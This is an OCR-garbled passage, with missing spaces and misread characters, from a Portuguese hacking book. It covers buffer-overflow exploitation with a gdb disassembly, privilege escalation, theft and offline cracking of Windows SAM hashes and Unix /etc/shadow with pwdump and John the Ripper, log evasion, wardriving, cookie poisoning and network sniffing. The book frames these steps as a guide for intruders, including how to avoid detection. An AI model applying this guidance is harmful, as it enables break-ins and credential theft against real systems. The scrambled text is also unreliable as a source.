Ox804846a<main+6>: cal1
Ox804846f<main+ll>: add
Ox8048472<main+14>: push
Ox8048477<main+19>: cal1
Ox804847c<main+24>: add
Ox804847f<main+27>: xor
Ox8048481<main+29>: jmp
Ox8048483<main+31>: leave
Ox8048484<main+32>: ret
Ox8048485<main+33>: lea
Ox8048489<main+37>: lea
Endofassemblerdump.
(gdb)

Universidade3°ano
Desenferrujandoumpouconossosconhecimentosdeassembler,lembramos
queafunçãocallchamaumaoutrafunçãoqualquerresidentenoendereço
especificado.Comoemlinguagemdemáquinanãodápraatribuirnomesàs
subrotinas,osistematemquesaberexatamenteondenamemóriaelasestão.
Nocomeçodalistagem,observequeafunçãomaininicianaposiçãodememó-
riaOx8048464einstruçãocallchamaumasubrotinaqueseencontraem
Ox8048430.Vamosdaragoraumaolhadanafunçãofuncao_idiota( ):
(gdb)disassfuncao_idiota
Durnpofassernblercodeforfunctionfuncao_idiota:
Ox8048430<funcao_idiota>: push %ebp
Ox8048431<funcao_idiota+l>: rnov %esp,%ebp
Ox8048433<funcao_idiota+3>: sub $Ox18,%esp
Ox8048436<funcao_idiota+6>: add $Oxfffffff4,%esp
Ox8048439<funcao_idiota+9>: lea Oxfffffff8(%ebp),%eax
Ox804843c<funcao_idiota+12>: push %eax
Ox804843d<funcao_idiota+l3>: call Ox8048304<gets>
Ox8048442<funcao_idiota+18>: add $Oxl0,%esp
Ox8048445<funcao_idiota+2l>: add $Oxfffffff8,%esp
Ox8048448<funcao_idiota+24>: lea Oxfffffff8(%ebp),%eax
Ox804844b<funcao_idiota+27>: push %eax
Ox804844c<funcao_idiota+28>: push $Ox8048500
Ox8048451<funcao_idiota+33>: calIOx8048334<printf>
Ox8048456<funcao_idiota+38>: add $Oxl0,%esp
Ox8048459<funcao_idiota+41>: jrnp Ox8048460<funcao_idiota+48>
Ox804845b<funcao_idiota+43>: nop
Ox804845c<funcao_idiota+44>: lea
Ox8048460<funcao_idiota+48>: leave
Ox8048461<funcao_idiota+49>: ret
Ox8048462<funcao_idiota+50>: rnov
Endofassernbler durnp.(gdb)
OxO(%esi, 1),%esi
%esi,%esi
Olhasó!Ocalldafunçãomain()chamaexatamenteafuncao_idiotaO.Den-
trodafunçãoidiota,alinha
Ox8048461<funcao_idiota+49>: ret
mostraainstruçãoassemblerderetomo(ret).Essainstruçãovaiusaropon-
teiroderetomoparavoltaraomain.Chegamosaocemedaquestãodosexploits
porbufferoverflow.Trocandoemmiúdos,vocêprecisa:
1.Descobrirumavariáveldotipobufferqueestejavulnerável;
2.Verificar,nocódigofonteouportentativaeerro,osendereçosondeas
chamadasdefunçãoestão,bemcomooendereçoquemarcaoiníciodobuffer
davariável;
3.Fabricarumexploitqueinsiracódigosdemáquinanobuffer,contendo
1261I
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3RI
instruçõesparanosdarumshell,edepois"estufe"apilhaatéatingiraposição
doponteiroderetorno,lácolocandooendereçodoiníciodobuffer.
Umexemplo,emUnix,seriaumarotinaque,atravésdafunçãoexecve()
chamasseumshell.execve()éumachamadadesistemaquesimplesmente
permiteexecutarumarquivobinárioexternoaoprograma.Quebeleza!De
dentrodenossoexploit,executamosIbin/sh!!!Oshelléexecutadonousuário
doprogramavulnerável.Sefor,porexemplo,noApache,ganharemosumshell
dousuárionobody.Oquehackersmaisgostam,nessahora,sãoprogramas
vulneráveisrodandocomSUID...Masissoéoutrahistória(váláepesquise!).
NoWindows,programasvulneráveisrodandocomprivilégioSystemsãoum
perigo!Acessototalàmáquina.Paraexplorarumbufferoverflow,geralmente
faz-sechamadasafunçõesdeDLLsacessíveispelaaplicaçãovulnerável.Dica
paraestudodeexecuçãoarbitráriadecomandosnoWindows:WININET.DLLe
opróprioMFC.DLL.Novamente,mexa-se...
Nãovamosnosaprofundarmais,poisnãoestánoescopodolivroentrar
muitofundonasentranhasdenenhumassembler.Paracomeçar,umbelotexto
parainiciantesembufferoverflows(mixter.void.ru/exploit.html).Parasaber
mais,recomendoaleituradoswhitepapersdaFatal3rror(struck.8m.com/G),
oexcelentetextodeDarkSpyritsobrebufferoverflowsnoWindows
(community.core-sdi.com/-julianolbufo.html)eoestudoquecomeçoutudo
isso:"Smashingthestackforfunandprofit",dolendárioAlephl,lançadona
edição49daezinePhrakem1996edisponívelonlinenoendereço
www.insecure.org/stf/smashstack.txt.
Outrowhite-paperdignodenota:comoexplorarserviçosavançadoscom
estourosdepilha,indomuitoalémdeconseguirumshell.TaehoOhnosmostra
empostech.edu/-ohhara(ou,alternativamente,emohhara.sarang.net/security/
adv.txt)comofurarfirewallsbaseadosemftltrosdepacotes,abrirsockets(e,
portanto,backdoors)nopróprioexploitelibertar-sedaprisãodochroot4.
Sevocêquerrealmenteconhecerafundotodososmeandrosdosestourosde
pilha(nosquais99%dosexploitsexistentessãobaseados),recomendo,nova-
mente,pararaleituradolivroeestudarossitesindicados.Lembre-se,oGoogle
éseuamigo...Desnecessáriodizerqueépré-requisitoparaissosaberalguns
fundamentosdeCeAssembler.Apesardealgunsdizeremquenão,aslingua-
gensPascal(eportantooDelphy/Kylixtambém)eBasic(VisualBasic,Thrbo
Basic,QuickBasic,...)emesmonovaslinguagenscomoC++,C#eJavatambém
padecemdomesmomal.Asformasdeexplorarosestourosnessaslinguagens
sãodiferentes,masaindaassimavulnerabilidadeexiste.
4.Chrooté,simplificandoadefinição,umamaneirade"enjaular"umaaplicaçãoqueprecisededireitos
desuperusuáriopararodar.Normalmente,instala-seaaplicaçãoemumdiretórioquepossuiumacópiado
sistemadearquivosdosistemaoper.acional,masnãoéosistemadearquivosverdadeiro.Nesseambiente
falso,aaplicaçãorodacompseudo-direitosderoot,quesóvalemdentrodoambiente.Aaplicaçãoficafeliz
emserenganadaerodaperfeitamente.Seumhackerinvadiressamáquinapormeiodeumbufferoverflow
daaplicaçãoemchroot,vaiconseguir,nomáximo,omesmosuperusuáriofalsoqueaaplicaçãousa.
2621
Ataque,defesaecontra-ataque:Invasãor

Universidade3°ano
Ganhandoacessoaoutrascontas
Youknowthedaydestroysthenight/Nightdividestheday/Triedtorun,
triedtohide/Breakonthroughtotheotherside5
Atéagora,invadimosumaúnicamáquina.Ok,vocêpodeterinvadidodiver-
sas,masmesmoque"Owne"dezouquinzedelasaindanãopesquisoucomoa
redeaoredorfunciona.Oupior:vocêconseguiuumshellrestritoenãoconse-
guefazermuitascoisas!Encontramosdoisexemplosclássicosnaspáginasan-
teriores:oservidorWebApache(querodaemusuárionobody)eaplicações
rodandoemchroot.
TomemosoApache:vocêaplicouumexploitneleeconseguiuumshell.Só
que,nesseshell,ousuárioqueestálogadoéonobody-umusuárioespecial
criadojustamenteparanãodarpoderesespeciaisapotenciaisinvasores.Como
oApachenãoprecisadepoderesespeciaispararodar,apenasacessoaseus
própriosarquivos,tudocorreàsmilmaravilhas.Umscriptkidentraporbuffer
overflow,temacessoaumshelldonobody,pode,talvez,sobrescreverumaou
outrapáginaHTML-esó!Nãotemacessoàrede,nãotempoderesderoot,
nãopossuisequerumdiretório!home...
NoWindows(NTe2000),apesardesermaisfreqüenteosadministradores
instalaremprogramasservidoresnosgruposSystemouAdministrator,tam-
bémépráticarecomendadadesegurançadeixartaisprogramascomomíni-
mopossíveldedireitossobreosistema.
Nessecenário,invadimosamáquinamasnãotemos,ainda,muitopoderso-
breela.Éhora,pois,detentarconseguir,dealgumaforma,acessoaoutras
contase,sepossível,aosuperusuário.
Aprimeiraformaéaquevimosnaspáginasanteriores.Todousuáriotem
acessoadiversosprogramasemsuamáquinanormal.NumamáquinaUnix
temosdiversosscripts,programasdetodosostamanhoscomofetchmail,MySQL,
Informix,Oracle,sendmail,login,telnet,popd,inetd...Maispertodousuário
final,ainda,temososervidorgráficoXWindows,osambientesKDE,Gnome,
CDE,WindowMaker(etcetcetc)eaplicativosassociados.Temosaindaospró-
priosconfiguradoresdosistema,comoLinuxconfnoLinux,SmitnoAIX,
AdmintoolnoSolaris,SAMnoHP-UX...Cadaumdelescommaioroumenor
graudedireitossobreosistema."Exploitar"qualquerumdosprogramasdeste
parágrafopodelevaraorootoua,pelomenos,umusuáriocommaisdireitos.
Umaúltimadica:leiaatentamenteaspáginasdemanualdoscomandossue
sudoedoarquivo/etc/sudoers.Vocêtalvezacheinteressante.(Rêhêhê...)
NoWindowsnãoénadadiferente.IIS,subsistemadesegurançaelogin,Access,
Word,Excel,Powerpoint(étriste,masjáencontramosservidorescomoOffice
5."Quandoodiadestróianoite/anoitedivideodia/tenteicorrer,tenteimeesconder/masagoraatraves-
soparaooutrolado".Breakonthrough[totheothersidej.DoálbumTheDoors,de1967.
12631
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
instalado...),MSSQLServer,CGlsdiversos...Todoselespodemserexplorados
paraoferecermaiscontrole.Atéquesechegaemalgumusuárioouprograma
quedáacessoàlinhadecomandoscomosprivilégiosdogrupoSystem(o
"root"doWindowNT).Adica,nestecaso,ficaporcontadeexploitssucessivos
(paraganharcadavezmaispoder)emdireçãoaalgumaDLLdopróprioKernel.
SevocêleuocapítulosobrePlataformasWindows,aprendeuqueváriaspartes
dokernelrodamemUserMode.Algumas,mesmoassim,rodamcomprivilégi-
osdogrupoSystem.2+2...
Emborasejaefetivoefácil,dependerdeexploitspodedeixá-Io"namão"em
sistemasbemconfiguradose,principalmente,atualizados.Há,entretanto,for-
masalternativasdeganharacessoaoutrascontas.Aquebradesenhasé,segu-
ramente,amaisusada.
Métodosparadescobrirusuáriosesenhas
Nocapítulo7(Vulnerabilidadesl)vimosdiversasmaneirasdequebraras
senhasdosistema.Vamosrelembraralgumas:
1.Loginsfracos:Duplasusuário/senhacompalavrasfacilmenteencontráveis
nodicionáriooupior,quepossamserdescobertasporengenhariasocial
-são
brinquedonamãodehackersexperientes.Listasdepalavraseaplicativosque
tentamcombinaçõesbaseadasemdicionáriosexistemàspencasporaí.
2.BruteForce:seosloginsnãosãoassimtãofracos,háaindaapossibilida-
dededirecionarumataque"burro",quetestaascombinaçõespossíveisde
letras,númerosesímbolosdotecladoatéencontrarumaoumaisduplasusuá-
rio/senhaqueentrem.
3.Rouboedecifragemdosarquivosdesenhas:seohackerconseguir
obterumacópiadosarquivosdesenhas(SAMdatabasesnoWindows,/etc/
passwde/etc/shadownoUnix)estádentro!Bastausarasferramentasconhe-
cidasparatal(comooLophtCrackparaWindowsouoJohntheRipperpara
Unix)epronto!Todasassenhasdosistemaestãonopapo,incluindoasdo
AdministradordoWindowsedorootnoUnix.
Antesdetentardescobrirparesdeloginsesenhas,vamosverumexemplode
ataquepordicionárioebruteforce.Observeumacoisa:jáestamosdentroda
máquina,portantonossoscriptnãovaimaisenviarumasolicitaçãodelogin
viarede.Podemosusarosprocedimentosdeloginlocaisdoprópriosistema
operacionalparatentarmudardeusuário.Novamente,umpoucodeengenha-
riasocial,sepossível,sempreajuda.
Apesardeserpossívelusarprogramasprontosparatal,comointernamente
cadacasoéumcasoomelhorcaminhoéfazerumscript(emshellnoUnixou
emWSEouVBAnoWindows)quetesteseqüencialmentetodaasualistade
palavrasemtodasascombinaçõesdeloginsesenhapossíveis.Elaboraras
listascomosnomesobtidosporengenhariasocialéumaboaprática.
Umscriptquefizesseissodeveriateraseguinteestrutura:
2641
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
1.Pegaapróximapalavradoarquivodedicionário;
2.Insereessenomenoprogramadelogindosistema;
3.Pegaaprimeirapalavradoarquivodedicionário;
4.Inserecomosenhanoprogramadelogindosistema;
5.Pegaapróximapalavradoarquivodedicionário;
6.Inserecomosenhanoprogramadelogindosistema;
7.Voltaaopasso5atéquetodasaspalavrastenhassidousadas;
8.Voltaaopasso1atéquetodasaspalavrastenhassidousadas.
Éfácilimplementarisso,porexemplo,comosprogramasloginousudo
Unixemumshellscript.Masháumproblema:VOCÊESTÁSENDOVlGIADO!!!
Todasastentativasmalsucedidasdeloginestarãosendoregistradasnoslogs
dosistema.Comovocêaindanãotemprivilégiosderoot,seriaimpossívelapa-
gartaisrastros.Esta,portanto,nãoéamelhormaneiradetentarentrar.Há
uma,entretanto,fantasticamentesimplesemuitomaissegura:oroubodoar-
quivodesenhaseposteriordecifragemdoshashes.
Éimperativonãoserdescoberto.Portanto,ametodologiausadapelamaioria
doscrackerséobteroarquivodesenhasdosistemaetentarquebrá-Ias,off1ine,
emcasa.Pode-seusardiversoscomputadoresligadosemc1usters-émuito
fácilfazeremcasa,comUnux,supercomputadorescomcincoouseis486se
mesmo386sobtidosdolixo-eosprogramasquebradoresdesenhasjácita-
dos-LOphtCrackeJohntheRipper.UmaúnicamáquinarodandoWindows
NTcomoLOphtCrackjáéalgoconsiderável:mesmoquedemoreumoudois
mesesparaconseguiralgumasenhausável,tempoéoqueohackermaistem.
E,trabalhandoemcasa,oseutrabalhonãoserádetectável.
QuebrandosenhasnoWindows
Asistemáticaésimples.Deve-se:
1.Roubaroarquivodesenhaselevarpracasa;
2.Passaroarquivodesenhasnoprogramaquebrador;
3.Testarassenhasrecuperadasnosistemaoriginalpraverseosusuários
nãoasalteraram.
Comoexemploprático,vamosusarumdescendentedoantigoLOphtCrack,o
LC4,atualmentedistribuídopelaempresadesegurança@Stake
(www.atstake.com).Criadoporhackerscomoprovadeconceitoparademons-
trarasfragilidadesdoshashesdoWindowsNT,osoftwarechegouatéaversão
2.5aindacomocódigofonteaberto.Nofinaldadécadade90osdireitossobre
osoftwareforamtransferidosàatualproprietária,eoLOphtCrack2.5foi
relançadocomoLC3.OLC4é,portanto,umaevoluçãodiretadoLOphtCrack
2.5.OsoftwareéhojevendidoaumpreçodeUS$350,00porlicença,masé
possívelfazerdownloaddeumaversãodeavaliaçãoválidapor15dias
-comas
rotinasdebrute-forcedesabilitadas.Nosite,a@Stakeoferece,gratuitamentee
comcódigofonte,aversão1.5doLOphtCrack-aindaemlinhadecomando.
1265I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Paraopasso1,devemosdealgumaforma"chupar"oshashesdosusuários
contidosnobancodedadosSAM,normalmenteguardadonoregistroem
HKEY_LOCAL_MACHINE\SECURlTY\SAM\Domains\Account\Users (achou
quenãoíamosdizerachave?).Paratanto,podemosusarumutilitáriodopró-
prioLC4,chamadopwdump.
OutroprogramaqueroubaassenhasdoSAMéopwdump3.Originalmente
desenvolvidoporJeremyAllisonandToddSabin,hojeémantidoporumaem-
presa,aPoliVec.EmbutidoemseuprodutomultiusodesegurançaPoliVec
Scanner,opwdump3(www.polivec.com/pwdump3.html)permitequeasse-
nhassejamrecuperadasinclusiveremotamente,pelarede(incluindoaInternet).
Umaterceiraopçãoéumutilitárioqueacompanhaopacotedeservidores
5MBparaUnix,oSamba(www.samba.org).Juntocomoprodutoestáincluído
umprograminhachamado(olhaqueoriginal...)pwdump,queextraioSAM
databaseeotransformaemumarquivodesenhasdoSamba(smbpasswd)
válido.Maisinformaçõessobreelepodemserobtidasemus1.samba.org/sam-
ba/ftp/pwdump/.
Nostrêscasos,gera-searquivosdesenhasqueoLC4podeinterpretar.Nostrês
casos,também,precisa-sedeprivilégiosdeAdministradorpararodaroprogra-
ma.Esseobstáculo,apesardecomplicado,aindaassimécontornável.Hádiversas
maneirasdefazê-Io:rodandooprogramanamáquinaalvoatravésdeumexploit,
rodandooprogramaemumamáquinadesenhasfracascomrelaçõesdeconfian-
çacomamáquinaalvo,fazendoinvasãofísicanolocalondeamáquinaestá...
Umavezconseguidooarquivodesenhas,passemosaopasso2.Desconecte-
secompletamentedaredeaserinvadidaerode,emcasa,oLC4contraseu
arquivo.Háumafartadocumentaçãoincluídacomopróprioproduto,portan-
tonãovamosdetalhá-IoaquLAfiguraaseguirmostraumprocessodecracking
emandamento,comalgumassenhasjádescobertas:
-<m.~
JHISI'1.A<ESUCI
OOU,I>SOI<T
.---
~,-
Od0h1ln!&
OdOh'm,*,
0.1""""52>
OdOhOrn..
G.om
,
iIomIh
.......
-.
,,,..--.
-
"-y"
mmn
mm?RGS3
1'rl??1/>.
_r
'AS"A"""''''
"'''''''''-
"!,,,.."u..
mmJ~
bobofett OdOhlm1o!<
,"-"
"'- 0.1""......
2661
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
Observe:comovimosnoscapítulossobreVulnerabilidades,ascontasnoWinNT
sãoguardadasem2hashes:umparaoantigoLanManagereoutrocomasenha
maisfortedoNT.Alémdo1MHashsermaisfácildequebrar,normalmenteos
usuáriosusamamesmasenhalocalmente(NTLM).OpróprioLc4sabedissoe,
umavezconseguidaasenhaLM,interrompeobruteforceetentaamesma
senhanoNT.Comovocêpodevernafigura,váriassenhasjáestãodescobertas
e,noexemplo,TODASsãoiguaisnosdoiscampos.Ousuárioshennesyparece
gostardoseriadoStarTreckeousuáriodjattanparecenãoestarmuitoconten-
tecomseulocaldetrabalho-comumpoucodeengenhariasocial,ohacker
nemprecisariadoLc4.OusuárioGuestnãopossuisenha(glup!).
AfiguraanteriorfoiretiradadeumestudodeDanSmith,naUniversidadeda
CarolinadoNorte,EUA,epodeserencontradoemwww.unc.edu/-smithdr/
inls187/sr.htm1.Oestudo,alémdeanalisarosoftware,trazdadossobretempo
paraquebrarsenhasdetodosostipos,fracasouteoricamenteseguras.
Porúltimo(passo3),testetodasassenhasqueconseguiunosistemainvadi-
do.Épossívelquealgumasestejamtrocadas,masvocêjásabe,pelomenos,o
nomedosusuáriosválidoseopadrãoqueelesusamparaelaborarsuassenhas.
Porexemplo,acontaAdministratormostradapossuíaumasenhaBARNABAS09.
Aschancesestãoentre80%e90%deque,nospróximosmeses,elaseja
BARNABASlO,BARNABASll...Achoqueoleitorjá"pescou"omecanismo!
QuebrandosenhasnoUnix
Vocêachaqueasistemáticamudou?Nadadisso:
1.Roubaroarquivodesenhaselevarpracasa;
2.Passaroarquivodesenhasnoprogramaquebrador;
3.Testarassenhasrecuperadasnosistemaoriginalpraverseousuárionãoaalterou.
HádiversosprogramasparaUnixquedescobremsenhasemarquivos
criptografados.OmaisconhecidocertamenteéoJohntheRipper.Usá-Ioétão
fácilquedáraiva.Umavezinstaladoeconfigurado,basta"alimentá-Io"como
arquivodesenhasedeixarqueelefaçaoserviço.Asintaxeésimples:
$johnarquivo_senhas
Nopasso1temososmesmoproblemasquetivemoscomoWmdows.Comovimos
nocapítulosobrePlataformasUnix,ossistemasmodernosutilizamosombreamento
desenhas,queconsisteemsepararoprocessodeloginemdoisarquivos:
o/etc/passwd(quecontéminformaçõesgeraissobreousuário,comonome,login,
GID,UID,diretório;homeeshellinicial)eo/etc/shadow(quecontémassenhas
criptografadas).Comoo/etc/passwdtemqueserlegívelportodos,oshashesficari-
amdesprotegidosseficassemaí.Oarquivo/etc/shadow,aocontrário,élegívele
editávelapenasetãosomentepelosuperusuário,oroot.Seosistemainvadidopos-
suirsombreamentodesenhas,vocêsóconseguirároubaroarquivo/etc/shadowse
estiveremumshellroot.Seosistemainvadidonãopossuirsombreamento,o"admi-
nistrador"jádeixoumetadedoserviçoprontoparavocê...6
6.Mesmoqueosistemapossuapasswordshadowing,vocêaindateráosnomesválidosdecontas. I267I
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
Encontrareaplicarumexploitquelhedêacessoarootéaformamaisdireta
paraconseguiroarquivodeshadow.Outrasformasincluem:
1.FazercoredumpsdeprogramasSUlDrootqueacessemassenhas(como
oFTp'oSSHouoTelnet);
2.Verificarnoarquivopasswdqualdosusuáriostêm"pinta"dead
mistrador-épossívelqueelepossuaprogramasSUlDemseu!home.
Umavezdescobertaasenha,chegamosaopasso2.Bastarodaro]ohnthe
Riperdeacordocomoconfiguradoeesperar.Nofinal,umalistadesenhas
válidas(possivelmenteadoroottambém)seráencontrada.Opasso3étrivial:
volteàcenadocrimeeuseassenhas.Nadacomologar-secomoumusuário
autorizadoparadespistarasauditoriasdeinvasão...
Ganhandoacessoedestruindoarede
Umavezdentrodarede,hádiversasaçõespossíveisdesertomadas.Estandoem
possedeumamáquina,podesermaisfácilinvadiroutras.Masnemsóde"Ownar"
viveumcracker.Épossível,porexemplo,usararedecomotrampolimparaoutras
redesmaiores.Oucapturarsenhasdosusuáriosemserviçoesexternos
-como
senhasdebancosounúmerosdocartãodecrédito.Ouaindadesviarotráfego
paraqueosusuáriossejamencaminhadosparaarmadilhasousitesfalsos.
Apresentaremosnestaseçãoapenasdescriçõesresumidasdessestiposde
ataques,comindicaçõesparasitescommaisinformações.
WarDrivingeWarChalking
UmadasmaisnovasformasdeinvasãocorporativaéoWarDriving.Hackers
saempelasruasdacidadecomgambiarrasfeitasdelatasdebatatafrita,arru-
elasealgunscabos,ecapturamconexõesderedewirelessqueestejam"vazan-
do".Comoascorporaçõesnãocostumamcriptografarsuasconexõesinternas,
umaconexãowirelessdessetipoforneceumacessoilimitado,similaraocon-
seguidoseoinvasorentrarandandopelaportadafrenteeplugarumcabodo
seulaptopemumatomadaderededaempresa.
Oassuntoérelativamentenovoemereceumestudomuitomaisprofundodo
queoqueseriapermitidonestelivro.Aliás,serianecessárioumlivrointeiro
sobreisso.Umaexcelentefontedeinformaçõeserecursos(tutoriais,equipa-
mentos,esquemasdeantena-inclusivefeitasemcasa)éosite
www:wardriving.com.Umesquemasimplesdeantena,construídocomojá
lendáriotubodebatatasfritasPringles,podeserencontradoem
www.oreillynet.com/cs/weblog/view/wlg/448.
HackerseuropeusforammaislongeecriaramoWarChalking
-umalfabeto
especialparamarcar,comgizenacalçada,ospontosdeacesso(posiçãoe
orientaçãodaantena)paraumamelhorconexãoàredealheia.Saibamaisso-
breastécnicasusadasnositeoficial:www.warchalking.org(ou,alternativa-
mente,www.warchalking.us).Essesitetrazinformaçõestécnicas,tutoriais,clu-
12681
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
besemuitoslinksparaoutrosrecursos.Ositewww.blackbeltjones.comtam-
bémtemdiversosrecursos.Umartigosobreoassuntopodeserencontradona
Mecadowireless,osite802.11Planet(www.80211-planet.com/columns/
artic1e.php/140240n.
.
IndoalémdoSQlInjection...
Emnossosegundoestudosobrevulnerabilidades,vimosmaneirassimplesde
enganaroscriptdapágina(sejaemASp'PHp,ColdFusionoualgumCGI)e
injetarnelamodificaçõesnaquerySQLassociada.Masháoutrasmaneirasde
brincarcomsistemasbaseadosemWeb.
AprimeiraemaisimediataéobservaremanipularosdadosdaprópriaURL.
Muitossistemason-linecarregaminformaçõesvaliosasemcampospresentesde-
poisdoendereçoHTfP(tarefaparacasa:pesquisarsobreosmétodosHTMLGEf
ePOS1).PentearumaURLgrandetentandoentendercomoosistemafuncionaéo
primeiropassoparaentraremtalsistema.Bancos,sitesdecomprasemesmosites
governamentaisutilizamaURLcomotransportededadosdoclientesemseim-
portarcomofatodesereminformaçõesvisíveisporqualquerumnarede.
Umexemplonotóriodissoforamasvulnerabilidadesencontradasháalguns
anosnoHotmail(www.hotmail.com).emqueosidentificadoresdesessão,
nomesdeusuárioehashesdassenhasestavampresentesnaprópriaURL.Hoje
oHotmailjánãopadecemaisdessemal,maspormuitosanosfoiumabrecha
extremamentefácildeexplorar.
PresteatençãoaindaemsitesqueusamchamadasODBCenãoSQL.Sistemas
100%MicrosofttendemaprivilegiaroinseguroprotocoloODBCparaacesso
abancosdedadosAccesseSQL-Server.
AlgunslinksparapesquisasobreSQLInjection:
~www.securiteam.com/securityreviews/5DPONlP76E.html
~online.securityfocus.com/infocus/1644
~www.sqlsecurity.com/DesktopDefault.aspx?tabindex=2&tabid=~
~www.nextgenss.com/papers/advancedsqlinjection.pdf
~www.spidynamics.com/papers/SQLIniectionWhitePaper.pdf
Outrométodoéocooldepoisoning,umamaneiradetorceraautenticação
viaWeb.Quaseatotalidadedossiteshojeemdiautilizam-sedecookiespara
controlaracessoesessão.AlterarUserIDeSessionIDemcookiespodeserum
atalhoparaentraremcontasdeoutrosusuários.
ÉmaisdifícilencontrarrecursossobrecookiepoisoningnaInternet.Sugeri-
mososseguintesrecursos:
~Whitepaper:Hackingwebapplicationsusingcookiepoisoning
(www.allasso.pt/base/docs/11042206054.pdO.
~BuscapelapalavrachavecookienoSecurityFocus(www.securityfocus.com).
1269I
IAtaque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3RI
Doissoftwaresquetrabalhamcomoproxybaseadosnodesktoppodemser
usadosparafacilitaramanipulaçãodeCookies(edecabeçalhosHTTPtam-
bém!):sãoelesoAchilleseoBrowseGate.AempresaqueproduzoAchilles
(DigiZenSecurityGroup-www.digizen-security.com)pareceterretiradoo
sitedoar,masdescriçõessobreoprodutopodemserencontradasno
PacketStorm(packetstormsecurity.nl/filedesc/achilles-O-27.zip.html)eno
SecuriTeam.com(www.securiteam.com/tools/6LOOR200KA.html).
OBrowseGate,desenvolvidopelaNetCPlus(www.netcplus.com/
browsegate.htrnl)éoutraopçãodeProxyServerquepodeserusadademanei-
ramaléficaparatorcercookieseautenticaçãoemsites.Háumaanálisedele
emwww.webattack.com/getlbrowsegate.shtml.
Paratodososproblemaslistados,possíveissoluçõespodemserencontradas
nositeoficialsobresegurançaemsistemasweb:www.owasp.org.
Farejandoarede(Sniffing)
Outraformadeganharacessoaumarede,depoisde"Ownar"umadasmá-
quinasqueaintegram,épassara"escutar"oqueestátrafegandonessarede.
Osprogramasquefazemessetipodetrabalhosujosãochamadosdesniffers
oufarejadores.
Umsniffertrabalhanacamada2denossomodelodereferênciaOS!.Isso
querdizerqueéimpossívelfazerumsniffingdiretamenteviaInternetem
umarededistante.Énecessárioqueoinvasorinstaleerodeosnifferemuma
máquinapertencenteàredelocalquesequerfarejar.
aobjetivomaisimediatodeuminvasorquandoinstalaumsnifferédesco-
brirsenhasdeoutrosusuáriosdamesmarede.Deixandoaferramenta"de
campana"poralgunsdias,épossívelconseguirsenhasdedezenasdeusuári-
osecentenasdeserviços(sites,e-mail,servidores,sistemas...).Comoháservi-
çosautorizadosparaalgunsusuáriosemespecialenegadosaosoutros,é
interessante,àmedidaquese
váconseguindosenhas,que
instalesniffersemdiversas
máquinase,comisso,consiga
umuniversomaiordelas.
Éfácilperceberque,nesse
contexto,oinvasorvai
"Ownando"aospoucosumgran-
denúmerodemáquinasdentro
darederemota.Comoéuma
ferramentadacamada2e,por-
tanto,local,osnifferdeveser
instaladoedeixadoemativida-
desemqueoinvasorinterve-
1270
I
Ataque,defesaecontra-ataque:Invasão[

Universidade3°ano
nha.Aferramentaescutaráaredeegravarátudooquefordeinteresseemum
arquivo.Depoisdealgumtempo(algunsdiasousemanas)ohackervoltaráao
localdocrimeapenaspararecuperaroarquivocomotesouro,oqualanalisa-
ráemcasa,desconectado.
Háumaformamaisperniciosadeusarosniffer:colocá-Ioemumgateway
entreredes.Comovimosnoscapítulospertinentes,umgatewayéumequipa-
mentoqueuneduasoumaisredesdiferentesdeformaapassarpacotesentre
elasquandoaplicável.Umsniffercolocadonumgatewaypodeescutar,então,o
tráfegodetodaselas.
Naprática,comoamaioriaesmagadoradosgatewaysligamsuaredeinterna
àInternet,oqueoinvasortemàdisposiçãoétantoseuconjuntopotencialde
senhaseinformaçõesconfidenciaisquantoose-mails,senhas,informaçõese
cartõesdecréditoqueentramesaemdesuaempresa.Imagine,numcenário
aindamaistenebroso,queumhackerplantouumsnifferemumgatewayque
ligasuaempresaaoseusitedecomércioeletrônico,ouàoperadoradecartões
decrédito,ouaseuparceiro,ouaobanco.Fatal!
Aprimeiraprovidênciaquandosevaifarejarumaredeécolocarainterface
derededealgumamáquinaemmodopromíscuo.Comovimosnoscapítulos
RedesIe11,quandoumpacoteIPchegaemumarede,ainterfacequedetémo
pacotepergunta:"qualéoMACAddressquecontémoendereçoIPdessepaco-
te"?AmáquinadestinorespondecomseuMACAddresseopacoteéenviadoa
ela.EsseéoconhecidoprotocoloARP.
"Enviadoaela",comoescritonoparágrafoanterior,éligeiramentementiro-
so(ou,comodiziaumpastorluteranoqueconheci,éum"exagerodaverda-
de").Opacoteé,naverdade,jogadonobarramentoetodasasinterfacespo-
demler.Oqueocorreéqueasinterfacesfazem"ouvidosmoucos"aopacote,
casoestenãosejadirecionadoaelas.Apenasamáquinaaquerealmentese
destina"prestaatenção"aoqueestátrafegandonarede.Asoutrassimplesmen-
teignoram-no.
Éaquiqueentrao"modopromíscuo".Umainterfaceconfiguradadessaforma
"ouve"TODOSospacotesquetrafegamnarede,enãoapenasosquesãodestinados
I271 I
]Ataque,defesaecontra-ataque:Invasão

IUniversidadeH4CK3R I
aela.Seissoéumfacilitadorparaaimplementaçãodeferramentasdemonitoração
derede
-coisaquetodoadministradorcompetentedeveriausar-tambémpossibi-
litaquealguémcommásintençõesfacilmenteescuteoquenãodevia.
Paracolocarumainterfacederedeemmodopromíscuo,deve-seteracesso
privilegiadoaosistemaoperacional-oqueequivaleadizerrootemumsiste-
maUnix,AdministratoremumsistemaWinNTouAdminemumNovell
Netware.Porissomesmo,tomarcompletamentepelomenosumamáquinana
rede(comovimosanteriormente)éimperativoparaquepossamosfazeruma
"colheita"posterior.Hádiversasformasdecolocarumainterfacederedeem
modopromíscuo.Háprogramasespeciaisparaissoemqualquerplataformae
mesmoalgunstruquesnosistemaoperacional(sejaeleWindows,Novell,HP-
UX...)sãopossíveissemoauxíliodequalquerprogramaexterno.
Todosistemaoperacionalpossuiumaferramentaqualquerquemostrao
estadoealteraasconfiguraçõesdaplacaderede.Tomandocomoexemploum
sistemaGNUlLinux,ocomandoquefazessetrabalhoparanóséoifconfig.
Emitido(comoroot)semargumentos,ocomandomostraoestadodetodasas
interfacesderede.Emitidoseguidodonomedeumainterface,dáoestado
atualdessainterface.Porexemplo,parasaberaquantasandaaprimeira
interfacederede(ethO),ocomandoseria:
#ifconfig ethO
oresultadoseria:
Encapsulamento doLink:EthernetEndereçodeHW00:08:74:B5:64:95
